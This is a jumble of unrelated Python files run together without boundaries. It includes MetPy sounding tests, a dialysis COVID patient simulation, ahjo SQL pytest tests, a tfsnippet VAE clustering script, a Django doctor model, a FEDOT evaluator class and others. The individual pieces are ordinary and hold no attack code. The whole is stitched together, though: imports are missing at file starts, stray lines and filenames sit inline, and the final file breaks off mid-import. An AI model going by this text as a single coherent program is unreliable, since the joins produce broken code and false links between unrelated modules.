from metpy.units import concatenate, units


@check_and_silence_warning(FutureWarning)
def test_precipitable_water():
    """Test precipitable water with observed sounding."""
    data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC')
    pw = precipitable_water(data['dewpoint'], data['pressure'], top=400 * units.hPa)
    truth = (0.8899441949243486 * units('inches')).to('millimeters')
    assert_array_equal(pw, truth)


@check_and_silence_warning(FutureWarning)
def test_precipitable_water_no_bounds():
    """Test precipitable water with observed sounding and no bounds given."""
    data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC')
    dewpoint = data['dewpoint']
    pressure = data['pressure']
    inds = pressure >= 400 * units.hPa
    pw = precipitable_water(dewpoint[inds], pressure[inds])
    truth = (0.8899441949243486 * units('inches')).to('millimeters')
    assert_array_equal(pw, truth)


@check_and_silence_warning(FutureWarning)
def test_precipitable_water_bound_error():
    """Test with no top bound given and data that produced floating point issue #596."""
    pressure = np.array([993., 978., 960.5, 927.6, 925., 895.8, 892., 876., 45.9, 39.9, 36.,
                         36., 34.3]) * units.hPa
    dewpoint = np.array([25.5, 24.1, 23.1, 21.2, 21.1, 19.4, 19.2, 19.2, -87.1, -86.5, -86.5,
                         -86.5, -88.1]) * units.degC
    pw = precipitable_water(dewpoint, pressure)
    truth = 89.86955998646951 * units('millimeters')
    assert_almost_equal(pw, truth, 8)


@check_and_silence_warning(FutureWarning)
def test_precipitable_water_nans():
    """Test that PW returns appropriate number if NaNs are present."""
    pressure = np.array([1001, 1000, 997, 977.9, 977, 957, 937.8, 925, 906, 899.3, 887, 862.5,
                         854, 850, 800, 793.9, 785, 777, 771, 762, 731.8, 726, 703, 700, 655,
                         630, 621.2, 602, 570.7, 548, 546.8, 539, 513, 511, 485, 481, 468, 448,
                         439, 424, 420, 412]) * units.hPa
    dewpoint = np.array([-25.1, -26.1, -26.8, np.nan, -27.3, -28.2, np.nan, -27.2, -26.6,
                         np.nan, -27.4, np.nan, -23.5, -23.5, -25.1, np.nan, -22.9, -17.8,
                         -16.6, np.nan, np.nan, -16.4, np.nan, -18.5, -21., -23.7, np.nan,
                         -28.3, np.nan, -32.6, np.nan, -33.8, -35., -35.1, -38.1, -40., -43.3,
                         -44.6, -46.4, -47., -49.2, -50.7]) * units.degC
    pw = precipitable_water(dewpoint, pressure)
    truth = 4.003709214463873 * units.mm
    assert_almost_equal(pw, truth, 8)


def test_mean_pressure_weighted():
    """Test pressure-weighted mean wind function with vertical interpolation."""
    data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC')
    u, v = mean_pressure_weighted(data['pressure'],
                                  data['u_wind'],
                                  data['v_wind'],
                                  heights=data['height'],
                                  depth=6000 * units('meter'))
    assert_almost_equal(u, 6.0208700094534775 * units('m/s'), 7)
    assert_almost_equal(v, 7.966031839967931 * units('m/s'), 7)


def test_mean_pressure_weighted_elevated():
    """Test pressure-weighted mean wind function with a base above the surface."""
    data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC')
    u, v = mean_pressure_weighted(data['pressure'],
                                  data['u_wind'],
                                  data['v_wind'],
                                  heights=data['height'],
                                  depth=3000 * units('meter'),
                                  bottom=data['height'][0] + 3000 * units('meter'))
    assert_almost_equal(u, 8.270829843626476 * units('m/s'), 7)
    assert_almost_equal(v, 1.7392601775853547 * units('m/s'), 7)


def test_bunkers_motion():
    """Test Bunkers storm motion with observed sounding."""
    data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC')
    motion = concatenate(bunkers_storm_motion(data['pressure'],
                                              data['u_wind'], data['v_wind'],
                                              data['height']))
    truth = [1.4537892577864744, 2.0169333025630616, 10.587950761120482, 13.915130377372801,
             6.0208700094534775, 7.9660318399679308] * units('m/s')
    assert_almost_equal(motion.flatten(), truth, 8)


def test_bulk_shear():
    """Test bulk shear with observed sounding."""
    data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC')
    u, v = bulk_shear(data['pressure'], data['u_wind'],
                      data['v_wind'], heights=data['height'],
                      depth=6000 * units('meter'))
    truth = [29.899581266946115, -14.389225800205509] * units('knots')
    assert_almost_equal(u.to('knots'), truth[0], 8)
    assert_almost_equal(v.to('knots'), truth[1], 8)


def test_bulk_shear_no_depth():
    """Test bulk shear with observed sounding and no depth given. Issue #568."""
    data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC')
    u, v = bulk_shear(data['pressure'], data['u_wind'],
                      data['v_wind'], heights=data['height'])
    truth = [20.225018939, 22.602359692] * units('knots')
    assert_almost_equal(u.to('knots'), truth[0], 8)
    assert_almost_equal(v.to('knots'), truth[1], 8)


def test_bulk_shear_elevated():
    """Test bulk shear with observed sounding and a base above the surface."""
    data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC')
    u, v = bulk_shear(data['pressure'], data['u_wind'],
                      data['v_wind'], heights=data['height'],
                      bottom=data['height'][0] + 3000 * units('meter'),
                      depth=3000 * units('meter'))
    truth = [0.9655943923302139, -3.8405428777944466] * units('m/s')
    assert_almost_equal(u, truth[0], 8)
    assert_almost_equal(v, truth[1], 8)


def test_supercell_composite():
    """Test supercell composite function."""
    mucape = [2000., 1000., 500., 2000.] * units('J/kg')
    esrh = [400., 150., 45., 45.] * units('m^2/s^2')
    ebwd = [30., 15., 5., 5.] * units('m/s')
    truth = [16., 2.25, 0., 0.]
    supercell_comp = supercell_composite(mucape, esrh, ebwd)
    assert_array_equal(supercell_comp, truth)


def test_supercell_composite_scalar():
    """Test supercell composite function with a single value."""
    mucape = 2000. * units('J/kg')
    esrh = 400. * units('m^2/s^2')
    ebwd = 30. * units('m/s')
    truth = 16.
    supercell_comp = supercell_composite(mucape, esrh, ebwd)
    assert_almost_equal(supercell_comp, truth, 6)


def test_sigtor():
    """Test significant tornado parameter function."""
    sbcape = [2000., 2000., 2000., 2000., 3000, 4000] * units('J/kg')
    sblcl = [3000., 1500., 500., 1500., 1500, 800] * units('meter')
    srh1 = [200., 200., 200., 200., 300, 400] * units('m^2/s^2')
    shr6 = [20., 5., 20., 35., 20., 35] * units('m/s')
    truth = [0., 0, 1.777778, 1.333333, 2., 10.666667]
    sigtor = significant_tornado(sbcape, sblcl, srh1, shr6)
    assert_almost_equal(sigtor, truth, 6)


def test_sigtor_scalar():
    """Test significant tornado parameter function with a single value."""
    sbcape = 4000 * units('J/kg')
    sblcl = 800 * units('meter')
    srh1 = 400 * units('m^2/s^2')
    shr6 = 35 * units('m/s')
    truth = 10.666667
    sigtor = significant_tornado(sbcape, sblcl, srh1, shr6)
    assert_almost_equal(sigtor, truth, 6)


def test_critical_angle():
    """Test critical angle with observed sounding."""
    data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC')
    ca = critical_angle(data['pressure'], data['u_wind'], data['v_wind'],
                        data['height'], stormu=0 * units('m/s'),
                        stormv=0 * units('m/s'))
    truth = [140.0626637513269] * units('degrees')
    assert_almost_equal(ca, truth, 8)


def test_critical_angle_units():
    """Test critical angle with observed sounding and different storm motion units."""
    data = get_upper_air_data(datetime(2016, 5, 22, 0), 'DDC')
    # Set storm motion in m/s
    ca_ms = critical_angle(data['pressure'], data['u_wind'], data['v_wind'],
                           data['height'], stormu=10 * units('m/s'),
                           stormv=10 * units('m/s'))
    # Set same storm motion in kt and m/s
    ca_kt_ms = critical_angle(data['pressure'], data['u_wind'], data['v_wind'],
                              data['height'], stormu=10 * units('m/s'),
                              stormv=19.4384449244 * units('kt'))
    # Make sure the resulting critical angles are equal
    assert_almost_equal(ca_ms, ca_kt_ms, 8)

src/ex4/split_iterable.py
def split_iterable(xs, y):
    answer, part = [], []
    for element in xs:
        if element == y:
            answer.append(part)
            part = []
        else:
            part.append(element)
    answer.append(part)
    return answer
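# A worked example for split_iterable (a sketch, not part of the original module):
# the separator value y closes the current sublist each time it appears.
assert split_iterable([1, 2, 0, 3, 0, 4], 0) == [[1, 2], [3], [4]]
assert split_iterable("abcbd", "b") == [["a"], ["c"], ["d"]]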
import pandas as pd
import random


class Patient:
    """
    Patient object.

    Object attributes
    -----------------

    _allocate: Reference to patient-unit allocation object
    _env: Reference to model environment object
    _params: Reference to scenario parameters object
    _pop: Reference to patient population object
    _units: Reference to unit object
    current_travel_time: current time to allocated unit
    current_unit: current unit patient allocated to
    current_unit_location: postcode of current unit
    default_time: time to unit patient allocated to in patient info CSV
    default_unit: unit patient allocated to in patient info CSV
    default_unit_location: postcode of default unit
    displaced: Whether patient is displaced from default unit (True/False)
    displaced_additional_time: Additional travel time if displaced
    dialysis_type: Dialysis type (HD unit or home)
    first_day: First day of the week for dialysis (Mon or Tues)
    inpatient_los: inpatient length of stay if inpatient stay required
    location: Patient home location (postcode sector)
    patient_id: id of patient (allocated in model)
    require_inpatient: Whether patient will need inpatient care (True/False)
    session: Current session at unit
    status: COVID status (negative, positive, recovered, died)
    time_in: Sim time patient created
    time_positive: Amount of time spent as COVID +ve outpatient
    time_to_infection: Time from model start that patient becomes infected
    unallocated_to_session: Currently unallocated to any session (True/False)
    will_be_infected: Patient will be infected in model (True/False)

    Methods
    -------

    patient_virus_progress:
        Progress patient through negative --> positive --> recover or die.
        Death occurs at end of positive episode. Patient may start the model
        in any state.
    """

    def __init__(self, env, patient_data, allocate, params, pop, units):
        """Constructor method for new patient. Patient data is passed as a
        dictionary."""
        self._allocate = allocate
        self.current_travel_time = 0
        self.current_unit = patient_data['default_unit']
        self.current_unit_location = patient_data['default_unit_location']
        self.default_time = 0
        self.default_unit = patient_data['default_unit']
        self.default_unit_location = patient_data['default_unit_location']
        self.displaced = False
        self.displaced_additional_time = 0
        self.dialysis_type = patient_data['dialysis_type']
        self._env = env
        self.first_day = patient_data['first_day']
        self.inpatient_los = patient_data['inpatient_los']
        self.location = patient_data['location']
        self._params = params
        self.patient_id = patient_data['patient_id']
        self._pop = pop
        self.require_inpatient = patient_data['require_inpatient']
        self.session = 'none'
        self.status = patient_data['status']
        self.time_in = env.now
        self.time_positive = patient_data['time_positive']
        self.time_to_infection = patient_data['time_to_infection']
        self.unallocated_to_session = False
        self._units = units
        self.will_be_infected = patient_data['will_be_infected']

        # Add travel times to non-home:
        if self.default_unit_location != 'HOME':
            self.current_travel_time = units.travel_times.loc[patient_data['location']][
                patient_data['default_unit_location']]
            self.default_time = self.current_travel_time
            self.displaced_additional_time = 0

        # Apply random positives
        if (self.status == 'negative' and
                random.random() < self._params.random_positive_rate_at_start):
            self.status = 'positive'

    def patient_virus_progress(self):
        """
        Progress patient through negative --> positive --> recover or die.
        Death occurs at end of positive episode. Patient may start the model
        in any state.
        """
        # Period as negative COVID
        if self.status == 'negative':
            # Period of cov negative:
            yield self._env.timeout(self.time_to_infection)
            # End of negative period, remove from patient allocation
            self._allocate.remove_patient(self)
            # Switch status to positive and re-allocate
            self.status = 'positive'
            # If previously unallocated, remove from list of unallocated patients
            if self in self._pop.unallocated_patients:
                self._pop.unallocated_patients.remove(self)
            # Allocate patient
            self._allocate.allocate_patient(self)
            # Add to appropriate patient list
            self._pop.positive_patients.append(self)

        # Period of positive COVID
        if self.status == 'positive':
            # Period of Cov positive
            yield self._env.timeout(self.time_positive)
            # End of positive period, remove from patient allocation and reset location
            self._allocate.remove_patient(self)
            # If previously unallocated, remove from list of unallocated patients
            if self in self._pop.unallocated_patients:
                self._pop.unallocated_patients.remove(self)
            # Check for inpatient stay
            if self.require_inpatient:
                self.status = 'inpatient'
                self._pop.inpatients.append(self)
                self._allocate.allocate_inpatient(self)
                # Time in inpatient
                yield self._env.timeout(self.inpatient_los)
                self._pop.inpatients.remove(self)
                self._allocate.inpatient_counts.loc[self.current_unit] -= 1
            # Check for mortality at end of positive (+ inpatient) phase
            if self._params.mortality_rand.sample() < self._params.mortality:
                # PATIENT DIES
                self.status = 'died'
                # Add to appropriate patient list
                self._pop.died_patients.append(self)
                # No allocation of patient required
                self.current_unit = 'none'
                self.session = 'none'
            else:
                # PATIENT RECOVERS
                self.status = 'recovered'
                # Allocate patient
                self._allocate.allocate_patient(self)
                # Add to appropriate patient list
                self._pop.recovered_patients.append(self)

from os import chdir, getcwd, path

import ahjo.database_utilities.sqla_utilities as ahjo
import pytest
from yaml import safe_load

MSSQL_PATTERNS = ahjo.get_dialect_patterns('mssql')
POSTGRESQL_PATTERNS = ahjo.get_dialect_patterns('postgresql')


@pytest.mark.parametrize("file_name", ['store.vwClients_UTF_16'])
def test_execute_from_file_should_raise_error_if_file_is_not_utf_8_bom(mssql_sample, file_name):
    sql_file = path.join(mssql_sample, f'database/error/{file_name}.sql')
    with pytest.raises(ValueError):
        ahjo.execute_from_file(None, sql_file)


@pytest.mark.mssql
class TestWithSQLServer():

    @pytest.fixture(scope='function', autouse=True)
    def exec_from_file_mssql_setup_and_teardown(self, ahjo_config, mssql_sample, mssql_engine,
                                                run_alembic_action, drop_mssql_objects):
        self.config = ahjo_config(mssql_sample)
        self.alembic_table = self.config['alembic_version_table_schema'] + \
            '.' + self.config['alembic_version_table']
        self.engine = mssql_engine
        old_cwd = getcwd()
        chdir(mssql_sample)
        run_alembic_action('upgrade', 'head')
        yield
        drop_mssql_objects(self.engine)
        run_alembic_action('downgrade', 'base')
        query = f"DROP TABLE {self.alembic_table}"
        self.engine.execute(query)
        chdir(old_cwd)

    @pytest.mark.parametrize("object_name", ['store.vwClients', 'store.vwProducts'])
    def test_execute_from_file_should_create_view(self, object_name):
        schema, name = object_name.split('.')
        query = "SELECT * FROM INFORMATION_SCHEMA.VIEWS WHERE TABLE_SCHEMA = ? AND TABLE_NAME = ?"
result = self.engine.execute(query, (schema, name)).fetchall() assert not result ahjo.execute_from_file( self.engine, f'database/views/{object_name}.sql' ) result = self.engine.execute(query, (schema, name)).fetchall() assert len(result) == 1 # possibility to parametrize def test_execute_from_file_should_insert_data(self): object_name = 'store.ProductCategory' query = f"SELECT COUNT(*) FROM {object_name}" result = self.engine.execute(query).fetchall() assert result[0] == (0,) ahjo.execute_from_file(self.engine, f'database/data/{object_name}.sql') result = self.engine.execute(query).fetchall() assert result[0] == (3,) @pytest.mark.mssql class TestWithPopulatedSQLServer(): @pytest.fixture(scope='function', autouse=True) def exec_from_file_mssql_setup_and_teardown(self, ahjo_config, mssql_sample, mssql_engine, run_alembic_action, deploy_mssql_objects, drop_mssql_objects, populate_table): self.config = ahjo_config(mssql_sample) self.alembic_table = self.config['alembic_version_table_schema'] + \ '.' + self.config['alembic_version_table'] self.engine = mssql_engine old_cwd = getcwd() chdir(mssql_sample) run_alembic_action('upgrade', 'head') deploy_mssql_objects(self.engine) populate_table(self.engine, 'store.Clients') populate_table(self.engine, 'store.Products') yield drop_mssql_objects(self.engine) run_alembic_action('downgrade', 'base') query = f"DROP TABLE {self.alembic_table}" self.engine.execute(query) chdir(old_cwd) @pytest.mark.parametrize("query_name,result_set", [ ('clients_are_populated', [['QUESTION', 'ANSWER'], ('Is Clients Populated?', 'YES')]), # nopep8 ('products_are_populated', []) # script has insufficient NOCOUNT setting # nopep8 ]) def test_execute_from_file_should_return_query_results(self, query_name, result_set): query_result = ahjo.execute_from_file( self.engine, f'database/tests/{query_name}.sql', include_headers=True ) assert query_result == result_set @pytest.mark.parametrize("query_name,result_set", [ ('table_row_count', [['Table name', 'Row count'], ('Clients', 5), ('Products', 3)]) # nopep8 ]) def test_execute_from_file_should_handle_variables(self, query_name, result_set, test_db_name): query_result = ahjo.execute_from_file( self.engine, f'database/tests/{query_name}.sql', scripting_variables={"DB_NAME": test_db_name}, include_headers=True ) assert query_result == result_set def get_query(dialect_name, query_key): """Get query used in test from config.""" current_dir = path.dirname(path.realpath(__file__)) query_file_path = path.join(current_dir, 'test_execute_from_file.yaml') with open(query_file_path, 'r') as f: queries = safe_load(f) return queries[dialect_name][query_key] @pytest.mark.parametrize("scripting_variables", [None, 'testi', ['value'], 10]) def test_insert_script_variables_should_raise_error_if_not_dict(scripting_variables): sql = get_query('mssql', 'query1')['sql_with_variables'] with pytest.raises(AttributeError): ahjo._insert_script_variables( dialect_patterns=MSSQL_PATTERNS, sql=sql, scripting_variables=scripting_variables ) def test_insert_script_variables_should_not_do_anything_if_empty_dict(): sql_before = get_query('mssql', 'query1')['sql_with_variables'] sql_after = ahjo._insert_script_variables( dialect_patterns=MSSQL_PATTERNS, sql=sql_before, scripting_variables={} ) assert sql_before == sql_after @pytest.mark.parametrize('query_key', ['query1']) def test_insert_script_variables_with_no_dialect(query_key): query = get_query('empty', query_key) sql_without_variables = ahjo._insert_script_variables( dialect_patterns={}, 
sql=query['sql_with_variables'], scripting_variables=query['variables'] ) for key in query['variables']: assert key not in sql_without_variables assert sql_without_variables == query['sql_with_value'] @pytest.mark.parametrize('query_key', ['query1']) def test_insert_script_variables_with_mssql(query_key): query = get_query('mssql', query_key) tsql_without_variables = ahjo._insert_script_variables( dialect_patterns=MSSQL_PATTERNS, sql=query['sql_with_variables'], scripting_variables=query['variables'] ) for key in query['variables']: assert key not in tsql_without_variables assert tsql_without_variables == query['sql_with_value'] # test_insert_script_variables_with_postgresql @pytest.mark.parametrize('query_key', ['query1']) def test_split_to_batches_with_empty_dialect_should_not_split(query_key): query = get_query('empty', query_key) batches = ahjo._split_to_batches( dialect_patterns={}, sql=query['sql_with_value'] ) assert len(batches) == 1 assert batches[0] == query['sql_with_value'] @pytest.mark.parametrize('query_key', ['query1', 'query2']) def test_split_to_batches_with_mssql_dialect_should_split_with_go(query_key): query = get_query('mssql', query_key) batches = ahjo._split_to_batches( dialect_patterns=MSSQL_PATTERNS, sql=query['sql_with_value'] ) assert len(batches) == len(query['batches']) for i in range(len(batches)): assert batches[i] == query['batches'][i] @pytest.mark.parametrize('query_key', ['query1']) def test_split_to_batches_with_postgresql_dialect_should_split_with_semicolon(query_key): query = get_query('postgresql', query_key) batches = ahjo._split_to_batches( dialect_patterns=POSTGRESQL_PATTERNS, sql=query['sql_with_value'] ) assert len(batches) == len(query['batches']) for i in range(len(batches)): assert batches[i] == query['batches'][i] # -*- coding: utf-8 -*- import codecs import functools import sys import warnings from argparse import ArgumentParser import tensorflow as tf from pprint import pformat from sklearn.metrics import accuracy_score from tensorflow.contrib.framework import arg_scope, add_arg_scope import tfsnippet as spt from tfsnippet.examples.utils import (MLResults, save_images_collection, ClusteringClassifier, bernoulli_as_pixel, bernoulli_flow, print_with_title) class ExpConfig(spt.Config): # model parameters x_dim = 784 z_dim = 16 n_clusters = 16 l2_reg = 0.0001 p_z_given_y_std = spt.ConfigField( str, default='unbound_logstd', choices=[ 'one', 'one_plus_softplus_std', 'softplus_logstd', 'unbound_logstd' ] ) mean_field_assumption_for_q = False # training parameters result_dir = None write_summary = False max_epoch = 3000 max_step = None batch_size = 128 vi_algorithm = spt.ConfigField( str, default='vimco', choices=['reinforce', 'vimco']) train_n_samples = 25 initial_lr = 0.001 lr_anneal_factor = 0.5 lr_anneal_epoch_freq = 300 lr_anneal_step_freq = None # evaluation parameters test_n_samples = 500 test_batch_size = 128 config = ExpConfig() @spt.global_reuse def gaussian_mixture_prior(y, z_dim, n_clusters): # derive the learnt z_mean prior_mean = spt.model_variable( 'z_prior_mean', dtype=tf.float32, shape=[n_clusters, z_dim], initializer=tf.random_normal_initializer() ) z_mean = tf.nn.embedding_lookup(prior_mean, y) # derive the learnt z_std z_logstd = z_std = None if config.p_z_given_y_std == 'one': z_logstd = tf.zeros_like(z_mean) else: prior_std_or_logstd = spt.model_variable( 'z_prior_std_or_logstd', dtype=tf.float32, shape=[n_clusters, z_dim], initializer=tf.zeros_initializer() ) z_std_or_logstd = tf.nn.embedding_lookup(prior_std_or_logstd, y) if 
config.p_z_given_y_std == 'one_plus_softplus_std': z_std = 1. + tf.nn.softplus(z_std_or_logstd) elif config.p_z_given_y_std == 'softplus_logstd': z_logstd = tf.nn.softplus(z_std_or_logstd) else: assert(config.p_z_given_y_std == 'unbound_logstd') z_logstd = z_std_or_logstd return spt.Normal(mean=z_mean, std=z_std, logstd=z_logstd) @spt.global_reuse @add_arg_scope def q_net(x, observed=None, n_samples=None): net = spt.BayesianNet(observed=observed) # compute the hidden features with arg_scope([spt.layers.dense], activation_fn=tf.nn.leaky_relu, kernel_regularizer=spt.layers.l2_regularizer(config.l2_reg)): h_x = tf.to_float(x) h_x = spt.layers.dense(h_x, 500) h_x = spt.layers.dense(h_x, 500) # sample y ~ q(y|x) y_logits = spt.layers.dense(h_x, config.n_clusters, name='y_logits') y = net.add('y', spt.Categorical(y_logits), n_samples=n_samples) y_one_hot = tf.one_hot(y, config.n_clusters, dtype=tf.float32) # sample z ~ q(z|y,x) with arg_scope([spt.layers.dense], activation_fn=tf.nn.leaky_relu, kernel_regularizer=spt.layers.l2_regularizer(config.l2_reg)): if config.mean_field_assumption_for_q: # by mean-field-assumption we let q(z|y,x) = q(z|x) h_z = h_x z_n_samples = n_samples else: if n_samples is not None: h_z = tf.concat( [ tf.tile(tf.reshape(h_x, [1, -1, 500]), tf.stack([n_samples, 1, 1])), y_one_hot ], axis=-1 ) else: h_z = tf.concat([h_x, y_one_hot], axis=-1) h_z = spt.layers.dense(h_z, 500) z_n_samples = None z_mean = spt.layers.dense(h_z, config.z_dim, name='z_mean') z_logstd = spt.layers.dense(h_z, config.z_dim, name='z_logstd') z = net.add('z', spt.Normal(mean=z_mean, logstd=z_logstd, is_reparameterized=False), n_samples=z_n_samples, group_ndims=1) return net @spt.global_reuse @add_arg_scope def p_net(observed=None, n_y=None, n_z=None, n_samples=None): if n_samples is not None: warnings.warn('`n_samples` is deprecated, use `n_y` instead.') n_y = n_samples net = spt.BayesianNet(observed=observed) # sample y y = net.add('y', spt.Categorical(tf.zeros([1, config.n_clusters])), n_samples=n_y) # sample z ~ p(z|y) z = net.add('z', gaussian_mixture_prior(y, config.z_dim, config.n_clusters), group_ndims=1, n_samples=n_z, is_reparameterized=False) # compute the hidden features for x with arg_scope([spt.layers.dense], activation_fn=tf.nn.leaky_relu, kernel_regularizer=spt.layers.l2_regularizer(config.l2_reg)): h_x = z h_x = spt.layers.dense(h_x, 500) h_x = spt.layers.dense(h_x, 500) # sample x ~ p(x|z) x_logits = spt.layers.dense(h_x, config.x_dim, name='x_logits') x = net.add('x', spt.Bernoulli(logits=x_logits), group_ndims=1) return net @spt.global_reuse def reinforce_baseline_net(x): with arg_scope([spt.layers.dense], kernel_regularizer=spt.layers.l2_regularizer(config.l2_reg), activation_fn=tf.nn.leaky_relu): h_x = tf.to_float(x) h_x = spt.layers.dense(h_x, 500) h_x = tf.squeeze(spt.layers.dense(h_x, 1), axis=-1) return h_x def main(): # parse the arguments arg_parser = ArgumentParser() spt.register_config_arguments(config, arg_parser, title='Model options') spt.register_config_arguments(spt.settings, arg_parser, prefix='tfsnippet', title='TFSnippet options') arg_parser.parse_args(sys.argv[1:]) # print the config print_with_title('Configurations', pformat(config.to_dict()), after='\n') # open the result object and prepare for result directories results = MLResults(config.result_dir) results.save_config(config) # save experiment settings for review results.make_dirs('plotting', exist_ok=True) results.make_dirs('train_summary', exist_ok=True) # input placeholders input_x = tf.placeholder( 
dtype=tf.int32, shape=(None, config.x_dim), name='input_x') learning_rate = spt.AnnealingVariable( 'learning_rate', config.initial_lr, config.lr_anneal_factor) # derive the loss and lower-bound for training with tf.name_scope('training'): train_q_net = q_net( input_x, n_samples=config.train_n_samples ) train_chain = train_q_net.chain( p_net, latent_axis=0, observed={'x': input_x}) if config.vi_algorithm == 'reinforce': baseline = reinforce_baseline_net(input_x) vae_loss = tf.reduce_mean( train_chain.vi.training.reinforce(baseline=baseline)) else: assert(config.vi_algorithm == 'vimco') vae_loss = tf.reduce_mean(train_chain.vi.training.vimco()) loss = vae_loss + tf.losses.get_regularization_loss() # derive the nll and logits output for testing with tf.name_scope('testing'): test_q_net = q_net( input_x, n_samples=config.test_n_samples ) test_chain = test_q_net.chain( p_net, latent_axis=0, observed={'x': input_x}) test_nll = -tf.reduce_mean( test_chain.vi.evaluation.is_loglikelihood()) # derive the classifier via q(y|x) q_y_given_x = tf.argmax(test_q_net['y'].distribution.logits, axis=-1, name='q_y_given_x') # derive the optimizer with tf.name_scope('optimizing'): optimizer = tf.train.AdamOptimizer(learning_rate) params = tf.trainable_variables() grads = optimizer.compute_gradients(loss, var_list=params) with tf.control_dependencies( tf.get_collection(tf.GraphKeys.UPDATE_OPS)): train_op = optimizer.apply_gradients(grads) # derive the plotting function with tf.name_scope('plotting'): plot_p_net = p_net( observed={'y': tf.range(config.n_clusters, dtype=tf.int32)}, n_z=10 ) x_plots = tf.reshape( tf.transpose(bernoulli_as_pixel(plot_p_net['x']), (1, 0, 2)), (-1, 28, 28) ) def plot_samples(loop): with loop.timeit('plot_time'): images = session.run(x_plots) save_images_collection( images=images, filename='plotting/{}.png'.format(loop.epoch), grid_size=(config.n_clusters, 10), results=results ) # derive the final un-supervised classifier c_classifier = ClusteringClassifier(config.n_clusters, 10) def train_classifier(loop): df = bernoulli_flow( x_train, config.batch_size, shuffle=False, skip_incomplete=False) with loop.timeit('cls_train_time'): [c_pred] = spt.evaluation.collect_outputs( outputs=[q_y_given_x], inputs=[input_x], data_flow=df, ) c_classifier.fit(c_pred, y_train) print(c_classifier.describe()) def evaluate_classifier(loop): with loop.timeit('cls_test_time'): [c_pred] = spt.evaluation.collect_outputs( outputs=[q_y_given_x], inputs=[input_x], data_flow=test_flow, ) y_pred = c_classifier.predict(c_pred) cls_metrics = {'test_acc': accuracy_score(y_test, y_pred)} loop.collect_metrics(cls_metrics) results.update_metrics(cls_metrics) # prepare for training and testing data (x_train, y_train), (x_test, y_test) = \ spt.datasets.load_mnist(x_shape=[784]) train_flow = bernoulli_flow( x_train, config.batch_size, shuffle=True, skip_incomplete=True) test_flow = bernoulli_flow( x_test, config.test_batch_size, sample_now=True) with spt.utils.create_session().as_default() as session, \ train_flow.threaded(5) as train_flow: # train the network with spt.TrainLoop(params, var_groups=['p_net', 'q_net', 'gaussian_mixture_prior'], max_epoch=config.max_epoch, max_step=config.max_step, summary_dir=(results.system_path('train_summary') if config.write_summary else None), summary_graph=tf.get_default_graph(), early_stopping=False) as loop: trainer = spt.Trainer( loop, train_op, [input_x], train_flow, metrics={'loss': loss}, summaries=tf.summary.merge_all(spt.GraphKeys.AUTO_HISTOGRAM) ) trainer.anneal_after( 
learning_rate, epochs=config.lr_anneal_epoch_freq, steps=config.lr_anneal_step_freq ) evaluator = spt.Evaluator( loop, metrics={'test_nll': test_nll}, inputs=[input_x], data_flow=test_flow, time_metric_name='test_time' ) evaluator.events.on( spt.EventKeys.AFTER_EXECUTION, lambda e: results.update_metrics(evaluator.last_metrics_dict) ) trainer.evaluate_after_epochs(evaluator, freq=10) trainer.evaluate_after_epochs( functools.partial(plot_samples, loop), freq=10) trainer.evaluate_after_epochs( functools.partial(train_classifier, loop), freq=10) trainer.evaluate_after_epochs( functools.partial(evaluate_classifier, loop), freq=10) trainer.log_after_epochs(freq=1) trainer.run() # print the final metrics and close the results object with codecs.open('cluster_classifier.txt', 'wb', 'utf-8') as f: f.write(c_classifier.describe()) print_with_title('Results', results.format_metrics(), before='\n') results.close() if __name__ == '__main__': main() 0 from django.db import models from django.core.validators import MinLengthValidator, RegexValidator from django.contrib.auth.models import User # Create your models here. class DoctorInfo(models.Model): user=models.OneToOneField(User,on_delete=models.CASCADE) address=models.CharField(max_length=100) phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$', message="Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.") phone_number = models.CharField(validators=[phone_regex], max_length=17, blank=True) picture=models.ImageField(blank=True,null=True) department=models.CharField(max_length=30) gender=models.CharField( max_length=50,blank=True,choices=(('Female','Female'),('Male','Male'),('Other','Other'))) doctorID=models.CharField(max_length=50,unique=True) education_college=models.CharField(max_length=100) education_degree=models.CharField(max_length=100) education_year=models.DateTimeField() def __str__(self): return self.user.first_name+" "+self.user.last_name @property def get_name(self): return self.user.first_name+" "+self.user.last_name @property def get_instance(self): return self cfxx.py import numpy as np def cfx_cal(cfx,nx,un,hs_up,g,snm): for i in np.arange(0,nx+1): cfx[i]=-g*snm**2*un[i]*np.abs(un[i])/hs_up[i]**(4./3.) return cfx from abc import ABC from typing import TypeVar, Generic from fedot.core.dag.graph import Graph from fedot.core.optimisers.fitness import Fitness from .objective import Objective G = TypeVar('G', bound=Graph, covariant=True) class ObjectiveEvaluate(ABC, Generic[G]): """Defines how Objective must be evaluated on Graphs. Responsibilities: - Graph-specific evaluation policy: typically, Graphs require some kind of evaluation before Objective could be estimated on them. E.g. Machine-learning pipelines must be fit on train data before they could be evaluated on the test data. - Objective-specific estimation: typically objectives require additional parameters besides Graphs for estimation, e.g. test data for estimation of prediction quality. - Optionally, compute additional statistics for Graphs (intermediate metrics). 
Default implementation is just a closure that calls :param objective: with redirected keyword arguments :param objective_kwargs: """ def __init__(self, objective: Objective, **objective_kwargs): self._objective = objective self._objective_kwargs = objective_kwargs @property def objective(self) -> Objective: """Returns underlying objective.""" return self._objective def __call__(self, graph: G) -> Fitness: """Provides functional interface for ObjectiveEvaluate.""" return self.evaluate(graph) def evaluate(self, graph: G) -> Fitness: """Evaluate graph and compute its fitness.""" return self._objective(graph, **self._objective_kwargs) def evaluate_intermediate_metrics(self, graph: G): """Compute intermediate metrics for each graph node and store it there.""" pass def cleanup(self, graph: G): """Clean resources after graph evaluation, if necessary.""" pass #!/usr/bin/env python "测试os._exit" import os def out_here(): print('Bye os world') os._exit(11) print('Never reach') if __name__ == '__main__': out_here() # # All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or # its licensors. # # For complete copyright and license terms please see the LICENSE at the root of this # distribution (the "License"). All use of this software is governed by the License, # or, if provided, by the license below or the license accompanying this file. Do not # remove or modify any license notices. This file is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # import os from waflib.Configure import 